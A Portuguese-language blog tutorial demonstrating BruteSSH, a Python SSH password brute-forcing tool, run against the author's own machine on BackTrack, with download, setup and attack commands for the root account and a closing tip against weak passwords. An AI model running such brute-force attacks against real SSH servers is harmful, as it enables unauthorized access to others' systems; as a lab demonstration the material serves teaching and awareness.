BruteSSH é um script feito em python que é capaz de fazer brute-force no serviço SSH. Para uma simples demo, irei realizar o ataque em minha própria máquina (127.0.0.1)
Instalando o BruteSSH
Abra o terminal e faça o download do arquivo pelo comandos a seguir:
root@bt:~# wget http://www.edge-security.com/soft/brutessh-0.5.tar.bz2
Agora vamos decompactar o arquivo:
root@bt:~# tar -jxvf brutessh-0.5.tar.bz2
Depois basta entrar no diretório
root@bt:~# cd brutessh root@bt:~/brutessh#
Agora é só rodar o script feito em python (py):
root@bt:~/brutessh# python brutessh.py
Se você observar, os parâmetros são bem simples. Vamos lá mostrar alguns.
-h: Host destino-u: Usuário
-d: Arquivo de senha
Ataque!
Uso o serviço SSH do BackTrack com login e senha padrão (root e toor), então vou criar uma pequena world list com a senha correspondente.
Agora vamos disparar o ataque usando a seguinte sintaxe:
root@bt:~/brutessh# python brutessh.py -h 127.0.0.1 -u root -d password
Onde os parâmetros foram explicados acima. O resultado foi:
No campo "Password Found", ele exibe a senha quebrada (toor).
Finalizando
Com uma ótima word list e paciência, você pode rapidamente conseguir acesso ao sistema por ssh, para se proteger, evite usar senhas de fáceis caracteres (toor, 123, 321) e mude sua senha regulamente.
--------------------
Video Aula Sobre o Assunto Em-Breve :D
Nenhum comentário:
Postar um comentário